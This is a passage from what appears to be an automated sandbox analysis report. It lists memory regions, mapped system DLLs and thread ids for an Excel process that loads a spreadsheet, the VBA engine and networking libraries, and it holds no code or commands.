"\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 459 start_va = 0x77560000 end_va = 0x776fcfff entry_point = 0x77560000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 460 start_va = 0x77700000 end_va = 0x77718fff entry_point = 0x77700000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 461 start_va = 0x77760000 end_va = 0x77859fff entry_point = 0x0 region_type = private name = "private_0x0000000077760000" filename = "" Region: id = 462 start_va = 0x77860000 end_va = 0x7797efff entry_point = 0x0 region_type = private name = "private_0x0000000077860000" filename = "" Region: id = 463 start_va = 0x77980000 end_va = 0x77b28fff entry_point = 0x77980000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 464 start_va = 0x77b60000 end_va = 0x77cdffff entry_point = 0x77b60000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 465 start_va = 0x7ef7a000 end_va = 0x7ef7cfff entry_point = 0x0 region_type = private name = "private_0x000000007ef7a000" filename = "" Region: id = 466 start_va = 0x7ef7d000 end_va = 0x7ef7ffff entry_point = 0x0 region_type = private name = "private_0x000000007ef7d000" filename = "" Region: id = 467 start_va = 0x7ef80000 end_va = 0x7ef82fff entry_point = 0x0 region_type = private name = "private_0x000000007ef80000" filename = "" Region: id = 468 start_va = 0x7ef83000 end_va = 0x7ef85fff entry_point = 0x0 region_type = private name = "private_0x000000007ef83000" filename = "" Region: id = 469 start_va = 0x7ef86000 end_va = 0x7ef88fff entry_point = 0x0 region_type = private name = "private_0x000000007ef86000" filename = "" Region: id = 470 start_va = 0x7ef89000 end_va = 0x7ef8bfff entry_point = 0x0 region_type = private name = "private_0x000000007ef89000" filename = "" Region: id = 471 start_va = 0x7ef8c000 end_va = 0x7ef8efff entry_point = 0x0 region_type = private name = "private_0x000000007ef8c000" filename = "" Region: id = 472 start_va = 0x7ef8f000 end_va = 0x7ef91fff entry_point = 0x0 region_type = private name = "private_0x000000007ef8f000" filename = "" Region: id = 473 start_va = 0x7ef92000 end_va = 0x7ef94fff entry_point = 0x0 region_type = private name = "private_0x000000007ef92000" filename = "" Region: id = 474 start_va = 0x7ef95000 end_va = 0x7ef97fff entry_point = 0x0 region_type = private name = "private_0x000000007ef95000" filename = "" Region: id = 475 start_va = 0x7ef98000 end_va = 0x7ef9afff entry_point = 0x0 region_type = private name = "private_0x000000007ef98000" filename = "" Region: id = 476 start_va = 0x7ef9b000 end_va = 0x7ef9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Region: id = 477 start_va = 0x7ef9e000 end_va = 0x7efa0fff entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 478 start_va = 0x7efa1000 end_va = 0x7efa3fff entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 479 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 480 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 481 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 482 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 483 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 484 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 485 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 486 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 487 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 488 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 489 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 490 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 491 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 492 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 493 start_va = 0x5410000 end_va = 0x5411fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005410000" filename = "" Region: id = 494 start_va = 0x6fa80000 end_va = 0x6fc0ffff entry_point = 0x6fa80000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 495 start_va = 0x6fc10000 end_va = 0x6fe47fff entry_point = 0x6fc10000 region_type = mapped_file name = "wpdshext.dll" filename = "\\Windows\\SysWOW64\\wpdshext.dll" (normalized: "c:\\windows\\syswow64\\wpdshext.dll") Region: id = 496 start_va = 0x6f9f0000 end_va = 0x6fa78fff entry_point = 0x6f9f0000 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\SysWOW64\\PortableDeviceApi.dll" (normalized: "c:\\windows\\syswow64\\portabledeviceapi.dll") Region: id = 497 start_va = 0x5420000 end_va = 0x5421fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005420000" filename = "" Region: id = 498 start_va = 0x6f700000 end_va = 0x6f73cfff entry_point = 0x6f700000 region_type = mapped_file name = "wmasf.dll" filename = "\\Windows\\SysWOW64\\WMASF.DLL" (normalized: "c:\\windows\\syswow64\\wmasf.dll") Region: id = 499 start_va = 0x6f740000 end_va = 0x6f9a6fff entry_point = 0x6f740000 region_type = mapped_file name = "wmvcore.dll" filename = "\\Windows\\SysWOW64\\WMVCORE.DLL" (normalized: "c:\\windows\\syswow64\\wmvcore.dll") Region: id = 500 start_va = 0x6f9b0000 end_va = 0x6f9eefff entry_point = 0x6f9b0000 region_type = mapped_file name = "audiodev.dll" filename = "\\Windows\\SysWOW64\\audiodev.dll" (normalized: "c:\\windows\\syswow64\\audiodev.dll") Region: id = 501 start_va = 0x6f6d0000 end_va = 0x6f6f1fff entry_point = 0x6f6d0000 region_type = mapped_file name = "ehstorapi.dll" filename = "\\Windows\\SysWOW64\\EhStorAPI.dll" (normalized: "c:\\windows\\syswow64\\ehstorapi.dll") Region: id = 502 start_va = 0x5f10000 end_va = 0x5f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000005f10000" filename = "" Region: id = 503 start_va = 0x6420000 end_va = 0x651ffff entry_point = 0x0 region_type = private name = "private_0x0000000006420000" filename = "" Region: id = 504 start_va = 0x6560000 end_va = 0x665ffff entry_point = 0x0 region_type = private name = "private_0x0000000006560000" filename = "" Region: id = 505 start_va = 0x75d00000 end_va = 0x75df4fff entry_point = 0x75d00000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 506 start_va = 0x77170000 end_va = 0x772a5fff entry_point = 0x77170000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 507 start_va = 0x7ef77000 end_va = 0x7ef79fff entry_point = 0x0 region_type = private name = "private_0x000000007ef77000" filename = "" Region: id = 508 start_va = 0x3af0000 end_va = 0x3afffff entry_point = 0x0 region_type = private name = "private_0x0000000003af0000" filename = "" Region: id = 509 start_va = 0x4020000 end_va = 0x4020fff entry_point = 0x0 region_type = private name = "private_0x0000000004020000" filename = "" Region: id = 510 start_va = 0x4030000 end_va = 0x4031fff entry_point = 0x0 region_type = private name = "private_0x0000000004030000" filename = "" Region: id = 511 start_va = 0x4940000 end_va = 0x49bffff entry_point = 0x4940000 region_type = mapped_file name = "qas_031218.xls" filename = "\\Users\\kFT6uTQW\\Desktop\\QAS_031218.xls" (normalized: "c:\\users\\kft6utqw\\desktop\\qas_031218.xls") Region: id = 512 start_va = 0x4ad0000 end_va = 0x4b4ffff entry_point = 0x4ad0000 region_type = mapped_file name = "~dfd72496dd051735ec.tmp" filename = "\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\~DFD72496DD051735EC.TMP" (normalized: "c:\\users\\kft6utqw\\appdata\\local\\temp\\~dfd72496dd051735ec.tmp") Region: id = 513 start_va = 0x5470000 end_va = 0x5473fff entry_point = 0x5470000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 514 start_va = 0x6520000 end_va = 0x691ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006520000" filename = "" Region: id = 515 start_va = 0x75550000 end_va = 0x755aefff entry_point = 0x75550000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 516 start_va = 0x65000000 end_va = 0x65277fff entry_point = 0x65000000 region_type = mapped_file name = "vbe6.dll" filename = "\\PROGRA~2\\COMMON~1\\MICROS~1\\VBA\\VBA6\\VBE6.DLL" (normalized: "c:\\progra~2\\common~1\\micros~1\\vba\\vba6\\vbe6.dll") Region: id = 517 start_va = 0x4020000 end_va = 0x402ffff entry_point = 0x0 region_type = private name = "private_0x0000000004020000" filename = "" Region: id = 518 start_va = 0x4080000 end_va = 0x4080fff entry_point = 0x0 region_type = private name = "private_0x0000000004080000" filename = "" Region: id = 519 start_va = 0x42a0000 end_va = 0x42bffff entry_point = 0x0 region_type = private name = "private_0x00000000042a0000" filename = "" Region: id = 520 start_va = 0x42c0000 end_va = 0x42c2fff entry_point = 0x0 region_type = private name = "private_0x00000000042c0000" filename = "" Region: id = 521 start_va = 0x42e0000 end_va = 0x42e3fff entry_point = 0x0 region_type = private name = "private_0x00000000042e0000" filename = "" Region: id = 522 start_va = 0x4880000 end_va = 0x4880fff entry_point = 0x0 region_type = private name = "private_0x0000000004880000" filename = "" Region: id = 523 start_va = 0x4890000 end_va = 0x4890fff entry_point = 0x0 region_type = private name = "private_0x0000000004890000" filename = "" Region: id = 524 start_va = 0x4b50000 end_va = 0x4b53fff entry_point = 0x0 region_type = private name = "private_0x0000000004b50000" filename = "" Region: id = 525 start_va = 0x4b60000 end_va = 0x4b7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b60000" filename = "" Region: id = 526 start_va = 0x4b80000 end_va = 0x4b82fff entry_point = 0x0 region_type = private name = "private_0x0000000004b80000" filename = "" Region: id = 527 start_va = 0x4b90000 end_va = 0x4b9cfff entry_point = 0x4b90000 region_type = mapped_file name = "vbe6.dll" filename = "\\PROGRA~2\\COMMON~1\\MICROS~1\\VBA\\VBA6\\VBE6.DLL" (normalized: "c:\\progra~2\\common~1\\micros~1\\vba\\vba6\\vbe6.dll") Region: id = 528 start_va = 0x4ba0000 end_va = 0x4ba3fff entry_point = 0x4ba0000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\SysWOW64\\stdole2.tlb" (normalized: "c:\\windows\\syswow64\\stdole2.tlb") Region: id = 529 start_va = 0x4bb0000 end_va = 0x4bb3fff entry_point = 0x0 region_type = private name = "private_0x0000000004bb0000" filename = "" Region: id = 530 start_va = 0x4bc0000 end_va = 0x4bc3fff entry_point = 0x0 region_type = private name = "private_0x0000000004bc0000" filename = "" Region: id = 531 start_va = 0x4c30000 end_va = 0x4caffff entry_point = 0x4c30000 region_type = mapped_file name = "~dff09a62abc6e16b1a.tmp" filename = "\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\~DFF09A62ABC6E16B1A.TMP" (normalized: "c:\\users\\kft6utqw\\appdata\\local\\temp\\~dff09a62abc6e16b1a.tmp") Region: id = 532 start_va = 0x4e00000 end_va = 0x4e02fff entry_point = 0x0 region_type = private name = "private_0x0000000004e00000" filename = "" Region: id = 533 start_va = 0x4e10000 end_va = 0x4e11fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e10000" filename = "" Region: id = 534 start_va = 0x4e20000 end_va = 0x4e2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e20000" filename = "" Region: id = 535 start_va = 0x4e30000 end_va = 0x4e31fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e30000" filename = "" Region: id = 536 start_va = 0x4e40000 end_va = 0x4e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e40000" filename = "" Region: id = 537 start_va = 0x4e50000 end_va = 0x4e50fff entry_point = 0x0 region_type = private name = "private_0x0000000004e50000" filename = "" Region: id = 538 start_va = 0x4f10000 end_va = 0x4f1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f10000" filename = "" Region: id = 539 start_va = 0x4f50000 end_va = 0x4f53fff entry_point = 0x0 region_type = private name = "private_0x0000000004f50000" filename = "" Region: id = 540 start_va = 0x5a50000 end_va = 0x5ac3fff entry_point = 0x5a50000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE12\\MSO.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office12\\mso.dll") Region: id = 541 start_va = 0x5ad0000 end_va = 0x5b0ffff entry_point = 0x0 region_type = private name = "private_0x0000000005ad0000" filename = "" Region: id = 542 start_va = 0x5cf0000 end_va = 0x5cfffff entry_point = 0x0 region_type = private name = "private_0x0000000005cf0000" filename = "" Region: id = 543 start_va = 0x5d00000 end_va = 0x5ddcfff entry_point = 0x5d00000 region_type = mapped_file name = "excel.exe" filename = "\\Program Files (x86)\\Microsoft Office\\Office12\\EXCEL.EXE" (normalized: "c:\\program files (x86)\\microsoft office\\office12\\excel.exe") Region: id = 544 start_va = 0x5f00000 end_va = 0x5f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000005f00000" filename = "" Region: id = 545 start_va = 0x60a0000 end_va = 0x60dffff entry_point = 0x0 region_type = private name = "private_0x00000000060a0000" filename = "" Region: id = 546 start_va = 0x6920000 end_va = 0x6d1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006920000" filename = "" Region: id = 547 start_va = 0x6e30000 end_va = 0x6f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000006e30000" filename = "" Region: id = 548 start_va = 0x6fc0000 end_va = 0x70bffff entry_point = 0x0 region_type = private name = "private_0x0000000006fc0000" filename = "" Region: id = 549 start_va = 0x7150000 end_va = 0x724ffff entry_point = 0x0 region_type = private name = "private_0x0000000007150000" filename = "" Region: id = 550 start_va = 0x65300000 end_va = 0x65325fff entry_point = 0x65300000 region_type = mapped_file name = "vbe6intl.dll" filename = "\\PROGRA~2\\COMMON~1\\MICROS~1\\VBA\\VBA6\\1033\\VBE6INTL.DLL" (normalized: "c:\\progra~2\\common~1\\micros~1\\vba\\vba6\\1033\\vbe6intl.dll") Region: id = 551 start_va = 0x7ef74000 end_va = 0x7ef76fff entry_point = 0x0 region_type = private name = "private_0x000000007ef74000" filename = "" Region: id = 552 start_va = 0x7ef77000 end_va = 0x7ef79fff entry_point = 0x0 region_type = private name = "private_0x000000007ef77000" filename = "" Region: id = 553 start_va = 0x7ef9b000 end_va = 0x7ef9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Region: id = 554 start_va = 0x52d0000 end_va = 0x52d3fff entry_point = 0x0 region_type = private name = "private_0x00000000052d0000" filename = "" Region: id = 555 start_va = 0x52e0000 end_va = 0x52e3fff entry_point = 0x0 region_type = private name = "private_0x00000000052e0000" filename = "" Region: id = 556 start_va = 0x5330000 end_va = 0x5333fff entry_point = 0x0 region_type = private name = "private_0x0000000005330000" filename = "" Region: id = 557 start_va = 0x5340000 end_va = 0x5343fff entry_point = 0x0 region_type = private name = "private_0x0000000005340000" filename = "" Region: id = 558 start_va = 0x5410000 end_va = 0x5413fff entry_point = 0x0 region_type = private name = "private_0x0000000005410000" filename = "" Region: id = 559 start_va = 0x5480000 end_va = 0x5483fff entry_point = 0x0 region_type = private name = "private_0x0000000005480000" filename = "" Region: id = 560 start_va = 0x5490000 end_va = 0x5493fff entry_point = 0x0 region_type = private name = "private_0x0000000005490000" filename = "" Region: id = 561 start_va = 0x54a0000 end_va = 0x54a3fff entry_point = 0x0 region_type = private name = "private_0x00000000054a0000" filename = "" Region: id = 562 start_va = 0x55b0000 end_va = 0x55b3fff entry_point = 0x0 region_type = private name = "private_0x00000000055b0000" filename = "" Region: id = 563 start_va = 0x55c0000 end_va = 0x55c3fff entry_point = 0x0 region_type = private name = "private_0x00000000055c0000" filename = "" Region: id = 564 start_va = 0x5810000 end_va = 0x5813fff entry_point = 0x0 region_type = private name = "private_0x0000000005810000" filename = "" Region: id = 565 start_va = 0x5820000 end_va = 0x5823fff entry_point = 0x0 region_type = private name = "private_0x0000000005820000" filename = "" Region: id = 566 start_va = 0x5870000 end_va = 0x5873fff entry_point = 0x0 region_type = private name = "private_0x0000000005870000" filename = "" Region: id = 567 start_va = 0x5880000 end_va = 0x5883fff entry_point = 0x0 region_type = private name = "private_0x0000000005880000" filename = "" Region: id = 568 start_va = 0x7250000 end_va = 0x764ffff entry_point = 0x0 region_type = private name = "private_0x0000000007250000" filename = "" Region: id = 569 start_va = 0x5c20000 end_va = 0x5cbffff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 570 start_va = 0x5890000 end_va = 0x5891fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005890000" filename = "" Region: id = 571 start_va = 0x59f0000 end_va = 0x5a07fff entry_point = 0x59f0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 572 start_va = 0x7d10000 end_va = 0x8052fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007d10000" filename = "" Region: id = 573 start_va = 0x58e0000 end_va = 0x58e7fff entry_point = 0x58e0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 574 start_va = 0x5b10000 end_va = 0x5b1bfff entry_point = 0x5b10000 region_type = mapped_file name = "index.dat" filename = "\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 575 start_va = 0x77720000 end_va = 0x77754fff entry_point = 0x77720000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 576 start_va = 0x77b30000 end_va = 0x77b35fff entry_point = 0x77b30000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 577 start_va = 0x5de0000 end_va = 0x5e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000005de0000" filename = "" Region: id = 578 start_va = 0x75500000 end_va = 0x75543fff entry_point = 0x75500000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 579 start_va = 0x7650000 end_va = 0x781ffff entry_point = 0x0 region_type = private name = "private_0x0000000007650000" filename = "" Region: id = 580 start_va = 0x754e0000 end_va = 0x754fbfff entry_point = 0x754e0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 581 start_va = 0x754d0000 end_va = 0x754d6fff entry_point = 0x754d0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 582 start_va = 0x75470000 end_va = 0x754c1fff entry_point = 0x75470000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 583 start_va = 0x75450000 end_va = 0x75464fff entry_point = 0x75450000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 584 start_va = 0x75440000 end_va = 0x7544cfff entry_point = 0x75440000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 585 start_va = 0x6100000 end_va = 0x613ffff entry_point = 0x0 region_type = private name = "private_0x0000000006100000" filename = "" Region: id = 586 start_va = 0x80c0000 end_va = 0x81bffff entry_point = 0x0 region_type = private name = "private_0x00000000080c0000" filename = "" Region: id = 587 start_va = 0x75430000 end_va = 0x75435fff entry_point = 0x75430000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\SysWOW64\\SensApi.dll" (normalized: "c:\\windows\\syswow64\\sensapi.dll") Region: id = 588 start_va = 0x7ef71000 end_va = 0x7ef73fff entry_point = 0x0 region_type = private name = "private_0x000000007ef71000" filename = "" Region: id = 589 start_va = 0x6db0000 end_va = 0x6deffff entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 590 start_va = 0x8260000 end_va = 0x835ffff entry_point = 0x0 region_type = private name = "private_0x0000000008260000" filename = "" Region: id = 591 start_va = 0x753f0000 end_va = 0x7542bfff entry_point = 0x753f0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 592 start_va = 0x7ef6e000 end_va = 0x7ef70fff entry_point = 0x0 region_type = private name = "private_0x000000007ef6e000" filename = "" Region: id = 593 start_va = 0x753e0000 end_va = 0x753e4fff entry_point = 0x753e0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 594 start_va = 0x76000000 end_va = 0x76002fff entry_point = 0x76000000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll") Region: id = 595 start_va = 0x5c20000 end_va = 0x5c20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005c20000" filename = "" Region: id = 596 start_va = 0x5c80000 end_va = 0x5cbffff entry_point = 0x0 region_type = private name = "private_0x0000000005c80000" filename = "" Region: id = 597 start_va = 0x753d0000 end_va = 0x753dffff entry_point = 0x753d0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 598 start_va = 0x7650000 end_va = 0x775ffff entry_point = 0x0 region_type = private name = "private_0x0000000007650000" filename = "" Region: id = 599 start_va = 0x77e0000 end_va = 0x781ffff entry_point = 0x0 region_type = private name = "private_0x00000000077e0000" filename = "" Region: id = 600 start_va = 0x7ae0000 end_va = 0x7c0ffff entry_point = 0x0 region_type = private name = "private_0x0000000007ae0000" filename = "" Region: id = 601 start_va = 0x7650000 end_va = 0x773ffff entry_point = 0x0 region_type = private name = "private_0x0000000007650000" filename = "" Region: id = 602 start_va = 0x7750000 end_va = 0x775ffff entry_point = 0x0 region_type = private name = "private_0x0000000007750000" filename = "" Region: id = 603 start_va = 0x753c0000 end_va = 0x753c5fff entry_point = 0x753c0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 604 start_va = 0x5eb0000 end_va = 0x5eeffff entry_point = 0x0 region_type = private name = "private_0x0000000005eb0000" filename = "" Region: id = 605 start_va = 0x84c0000 end_va = 0x85bffff entry_point = 0x0 region_type = private name = "private_0x00000000084c0000" filename = "" Region: id = 606 start_va = 0x753b0000 end_va = 0x753bffff entry_point = 0x753b0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\SysWOW64\\NapiNSP.dll" (normalized: "c:\\windows\\syswow64\\napinsp.dll") Region: id = 607 start_va = 0x7ef6b000 end_va = 0x7ef6dfff entry_point = 0x0 region_type = private name = "private_0x000000007ef6b000" filename = "" Region: id = 608 start_va = 0x75390000 end_va = 0x753a1fff entry_point = 0x75390000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\SysWOW64\\pnrpnsp.dll" (normalized: "c:\\windows\\syswow64\\pnrpnsp.dll") Region: id = 609 start_va = 0x75380000 end_va = 0x75387fff entry_point = 0x75380000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\SysWOW64\\winrnr.dll" (normalized: "c:\\windows\\syswow64\\winrnr.dll") Region: id = 610 start_va = 0x75370000 end_va = 0x75375fff entry_point = 0x75370000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 611 start_va = 0x75330000 end_va = 0x75367fff entry_point = 0x75330000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 612 start_va = 0x87a0000 end_va = 0x87dffff entry_point = 0x0 region_type = private name = "private_0x00000000087a0000" filename = "" Region: id = 613 start_va = 0x752d0000 end_va = 0x75329fff entry_point = 0x752d0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\SysWOW64\\netprofm.dll" (normalized: "c:\\windows\\syswow64\\netprofm.dll") Region: id = 614 start_va = 0x752c0000 end_va = 0x752c7fff entry_point = 0x752c0000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\SysWOW64\\npmproxy.dll" (normalized: "c:\\windows\\syswow64\\npmproxy.dll") Region: id = 742 start_va = 0x752a0000 end_va = 0x752b1fff entry_point = 0x752a0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 743 start_va = 0x75290000 end_va = 0x7529cfff entry_point = 0x75290000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 744 start_va = 0x5c30000 end_va = 0x5c40fff entry_point = 0x5c30000 region_type = mapped_file name = "c_20127.nls" filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls") Region: id = 745 start_va = 0x6d40000 end_va = 0x6d7ffff entry_point = 0x0 region_type = private name = "private_0x0000000006d40000" filename = "" Region: id = 746 start_va = 0x87e0000 end_va = 0x88dffff entry_point = 0x0 region_type = private name = "private_0x00000000087e0000" filename = "" Region: id = 747 start_va = 0x88e0000 end_va = 0x99effff entry_point = 0x88e0000 region_type = mapped_file name = "excel.exe" filename = "\\Program Files (x86)\\Microsoft Office\\Office12\\EXCEL.EXE" (normalized: "c:\\program files (x86)\\microsoft office\\office12\\excel.exe") Region: id = 748 start_va = 0x7ef68000 end_va = 0x7ef6afff entry_point = 0x0 region_type = private name = "private_0x000000007ef68000" filename = "" Region: id = 749 start_va = 0x6260000 end_va = 0x631ffff entry_point = 0x6260000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Thread: id = 1 os_tid = 0x9b4 Thread: id = 2 os_tid = 0x9b0 Thread: id = 3 os_tid = 0x9ac Thread: id = 4 os_tid = 0x9a8 Thread: id = 5 os_tid = 0x9a4 Thread: id = 6 os_tid = 0x9a0 Thread: id = 7 os_tid = 0x99c Thread: id = 8 os_tid = 0x998 Thread: id = 9 os_tid = 0x994 Thread: id = 10 os_tid = 0x990 Thread: id = 11 os_tid = 0x98c Thread: id = 12 os_tid = 0x988 Thread: id = 13 os_tid = 0x980 Thread: id = 14 os_tid = 0x97c Thread: id = 15 os_tid = 0x974 Thread: id = 16 os_tid = 0x964 Thread: id = 17 os_tid 